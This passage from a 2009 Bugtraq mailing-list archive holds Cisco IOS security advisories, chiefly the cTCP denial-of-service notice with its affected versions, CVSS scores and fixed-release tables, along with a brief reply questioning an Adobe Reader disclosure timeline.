| | | |
| 12.4XT | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4XV | Vulnerable; contact TAC | |
|------------+--------------------------------------+---------------|
| 12.4XW | 12.4(11)XW10 | 12.4(11)XW10 |
|------------+--------------------------------------+---------------|
| 12.4XY | 12.4(15)XY4 | 12.4(22)T1 |
|------------+--------------------------------------+---------------|
| 12.4XZ | 12.4(15)XZ1 | 12.4(15)XZ2 |
|------------+--------------------------------------+---------------|
| 12.4YA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4YB | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4YD | Not Vulnerable | |
+-------------------------------------------------------------------+
Workarounds
==========
There are no workarounds for the vulnerabilities described in this
advisory.
Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at
http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered when handling customer support
calls.
Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
===============
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-March-25 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAknKUdcACgkQ86n/Gc8U/uALXwCgmcIGTSzRIHpHRbVVmMNqPFT4
+CIAn27HdwwpkhVDgEIWTMsIX6NE4BgR
=+f8D
-----END PGP SIGNATURE-----
From - Wed Mar 25 13:42:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006ca9
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39840-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 9A4F1EC186
for <lists@securityspace.com>; Wed, 25 Mar 2009 13:33:54 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 22F33237045; Wed, 25 Mar 2009 09:55:51 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2646 invoked from network); 25 Mar 2009 16:39:57 -0000
From: Florian Weimer <fw@deneb.enyo.de>
To: Secunia Research <remove-vuln@secunia.com>
Cc: bugtraq@securityfocus.com
Subject: Re: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow
References: <200903250922.n2P9M5l6016676@ca.secunia.com>
Date: Wed, 25 Mar 2009 17:42:11 +0100
In-Reply-To: <200903250922.n2P9M5l6016676@ca.secunia.com> (Secunia Research's
message of "Wed, 25 Mar 2009 10:22:05 +0100")
Message-ID: <87myb9k10c.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Status:
* Secunia Research:
> =====================================================================> 5) Solution
>
> Update to version 7.1.1, 8.1.4, or 9.1.
>
> =====================================================================> 6) Time Table
>
> 06/03/2009 - Vendor notified.
> 07/03/2009 - Vendor response.
> 25/03/2009 - Public disclosure.
Something doesn't add up because the 9.1 binary I've got was created
on February 28th, according to Verisign's time stamping signature in
the Authenticode signature.
From - Wed Mar 25 14:52:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006caa
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39835-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 105F2EC182
for <lists@securityspace.com>; Wed, 25 Mar 2009 14:43:05 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 34B35236F43; Wed, 25 Mar 2009 09:33:30 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 568 invoked from network); 25 Mar 2009 16:09:10 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS cTCP Denial of Service Vulnerability
Date: Wed, 25 Mar 2009 17:00:00 +0100
Message-id: <200903251705.ctcp@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report:
Content-Return: Prohibited
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS cTCP Denial of Service
Vulnerability
Advisory ID: cisco-sa-20090325-ctcp
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml
Revision 1.0
For Public Release 2009 March 25 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
======
A series of TCP packets may cause a denial of service (DoS) condition
on Cisco IOS devices that are configured as Easy VPN servers with the
Cisco Tunneling Control Protocol (cTCP) encapsulation feature. Cisco
has released free software updates that address this vulnerability.
No workarounds are available; however, the IPSec NAT traversal
(NAT-T) feature can be used as an alternative.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml
Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.
http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml
Individual publication links are listed below:
* Cisco IOS cTCP Denial of Service Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml
* Cisco IOS Software Multiple Features IP Sockets Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml
* Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml
* Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml
* Cisco IOS Software Session Initiation Protocol Denial of Service
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml
* Cisco IOS Software Multiple Features Crafted TCP Sequence
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
* Cisco IOS Software Multiple Features Crafted UDP Packet
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml
* Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml
Affected Products
================
Vulnerable Products
+------------------
Cisco IOS devices running versions 12.4(9)T or later and configured
for Cisco Tunneling Control Protocol (cTCP) encapsulation for EZVPN
server are vulnerable.
Note: The cTCP encapsulation feature was introduced in Cisco IOS
version 12.4(9)T. The cTCP encapsulation feature is disabled by
default. Cisco IOS devices configured for EZVPN client are not
affected by this vulnerability. Only devices configured as EZVPN
servers are vulnerable.
To configure the cTCP encapsulation feature for Easy VPN, use the
crypto ctcp command in global configuration mode. You can optionally
specify the port number that the device will listen to with the
crypto ctcp port <port> command. Up to ten numbers can be configured
and the port value can be from 1 through 65535. If the port keyword
is not configured, the default port number is 10000. In the following
example, the Cisco IOS device is configured to listen for cTCP
messages on port 10000.
crypto ctcp port 10000
Note: The port keyword is configured only on the Cisco IOS device
acting as an EZVPN server.
To determine the version of the Cisco IOS software running on a Cisco
product, log in to the device and issue the show version command to
display the system banner. Cisco IOS software will identify itself as
"Internetwork Operating System Software" or simply "IOS". On the next
line of output, the image name will be displayed between parentheses,
followed by "Version" and the IOS release name. Other Cisco devices
will not have the show version command or will give different output.
The following example identifies a Cisco product running Cisco IOS
Software release 12.3(26) with an installed image name of C2500-IS-L:
Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih
<output truncated>
The next example shows a product running Cisco IOS Software release
12.4(20)T with an image name of C1841-ADVENTERPRISEK9-M:
Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team
<output truncated>
Additional information on the Cisco IOS release naming conventions
can be found on the document entitled "White Paper: Cisco IOS
Reference Guide", which is available at
http://www.cisco.com/warp/public/620/1.html
Products Confirmed Not Vulnerable
+--------------------------------
Cisco IOS devices that are not configured for cTCP are not affected
by this vulnerability. The Cisco ASA and Cisco VPN 3000 series
concentrators are not vulnerable. Cisco IOS devices configured as
EZVPN clients are not affected by this vulnerability. The Cisco VPN
Client is not vulnerable. Cisco IOS-XR and Cisco IOS-XE software are
not affected by this vulnerability. No other Cisco products are
currently known to be affected by this vulnerability.
Details
======
The Cisco Tunneling Control Protocol (cTCP) feature is used by Easy
VPN remote device operating in an environment in which standard IPSec
does not function transparently without modification to existing
firewall rules. The cTCP traffic is actually TCP traffic. Cisco IOS
cTCP packets are Internet Key Exchange (IKE) or Encapsulating
Security Payload (ESP) packets that are being transmitted over TCP.
A vulnerability exists where a series of TCP packets may cause a
Cisco IOS device that is configured as an Easy VPN server with the
cTCP encapsulation feature to run out of memory. This vulnerability
is documented in Cisco Bug IDs CSCsr16693 and CSCsu21828; and has
been assigned the Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0635.
Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss.
CSCsr16693 - cTCP server may crash when processing a series of TCP
packets
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsu21828 - Cisco IOS Device may crash with cTCP enabled
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of this vulnerability may cause the affected
device to run out of memory. Repeated exploitation will result in a
denial of service (DoS) condition.
Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Releases" column of the
table.
+-------------------------------------------------------------------+
| Major Release | Availability of Repaired Releases |
|-------------------+-----------------------------------------------|
| Affected | | |
| 12.0-Based | First Fixed Release | Recommended Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases |
|-------------------------------------------------------------------|
| Affected | | |
| 12.1-Based | First Fixed Release | Recommended Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases |
|-------------------------------------------------------------------|
| Affected | | |
| 12.2-Based | First Fixed Release | Recommended Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.2 based releases |
|-------------------------------------------------------------------|
| Affected | | |
| 12.3-Based | First Fixed Release | Recommended Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.3 based releases |
|-------------------------------------------------------------------|
| Affected | | |
| 12.4-Based | First Fixed Release | Recommended Release |
| Releases | | |
|-------------------+-----------------------+-----------------------|
| 12.4 | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4JA | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4JDA | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4JK | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4JL | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4JMA | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4JMB | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4JX | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4MD | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4MR | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4SW | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| | 12.4(20)T2 | 12.4(22)T1 |
| 12.4T | | |
| | 12.4(15)T9; Available | 12.4(15)T9; Available |
| | on 29-APR-2009 | on 29-APR-2009 |
|-------------------+-----------------------+-----------------------|
| 12.4XA | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XB | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XC | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XD | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XE | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XF | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XG | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XJ | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XK | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XL | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XM | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XN | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XP | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XQ | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XR | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XT | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XV | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XW | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XY | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4XZ | 12.4(15)XZ2 | 12.4(15)XZ2 |
|-------------------+-----------------------+-----------------------|
| 12.4YA | 12.4(20)YA2 | 12.4(20)YA3 |
|-------------------+-----------------------+-----------------------|
| 12.4YB | Not Vulnerable | |
|-------------------+-----------------------+-----------------------|
| 12.4YD | Not Vulnerable | |
+-------------------------------------------------------------------+
Workarounds
==========
No workarounds are available.
As an alternative, the IPSec NAT traversal (NAT-T) feature can be
used. The IPSec NAT-T feature introduces support for IP Security
(IPSec) traffic to travel through Network Address Translation (NAT)
or Port Address Translation (PAT) points in the network by addressing
many known incompatabilites between NAT and IPSec.
Note: The NAT-T feature was introduced in Cisco IOS version 12.2(13)
T.
NAT Traversal is a feature that is auto detected by VPN devices.
There are no configuration steps for a router running Cisco IOS
Release 12.2(13)T and later. If both VPN devices are NAT-T capable,
NAT Traversal is auto-detected and auto-negotiated.
Note: When you enable NAT-T, the Cisco IOS device automatically opens
UDP port 4500 on all IPSec enabled interfaces.
Caution: Be aware that you may need to enable IPSec over UDP on Cisco
VPN software clients to support NAT-T. Additionally, you may need to
change firewall rules to allow UDP port 500 for Internet Key Exchange
(IKE) and UDP port 4500 for NAT-T.
For more information about NAT-T, refer to the white paper at:
http://www.cisco.com/en/US/docs/ios/security/configuration/guide/sec_ipsec_nat_transp.html
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Mitigation Bulletin
companion document for this advisory, which is available at the
following link:
http://www.cisco.com/warp/public/707/cisco-amb-20090325-ctcp.shtml
Obtaining Fixed Software
=======================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at
http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use in
various languages.
Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was found during the resolution of a technical
support service request.
Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
===============
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-March-25 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAknKUaYACgkQ86n/Gc8U/uBSWwCbBgAQRNBNdft9MYK8bC1MP/Z4
4D8AnA7qaiFqAdeWWbS+p4K601XNoo4S
=Rvhp
-----END PGP SIGNATURE-----
From - Wed Mar 25 14:52:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006cab
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39836-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B84E0EC183
for <lists@securityspace.com>; Wed, 25 Mar 2009 14:52:42 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 55FDD236FBB; Wed, 25 Mar 2009 09:33:38 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 591 invoked from network); 25 Mar 2009 16:09:12 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
Date: Wed, 25 Mar 2009 17:00:00 +0100
Message-id: <200903251705.mobileip@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report:
Content-Return: Prohibited
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS Software Mobile IP and Mobile IPv6
Vulnerabilities
Advisory ID: cisco-sa-20090325-mobileip
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml
Revision 1.0
For Public Release 2009 March 25 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
======
Devices that are running Cisco IOS Software and configured for Mobile
IP Network Address Translation (NAT) Traversal feature or Mobile IPv6
are vulnerable to a denial of service (DoS) attack that may result in
a blocked interface.
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at the following link
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml
Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.
http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml
Individual publication links are listed below:
* Cisco IOS cTCP Denial of Service Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml
* Cisco IOS Software Multiple Features IP Sockets Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml
* Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml
* Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml
* Cisco IOS Software Session Initiation Protocol Denial of Service
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml
* Cisco IOS Software Multiple Features Crafted TCP Sequence
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
* Cisco IOS Software Multiple Features Crafted UDP Packet
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml
* Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml
Affected Products
================
Devices that are running an affected version of Cisco IOS Software
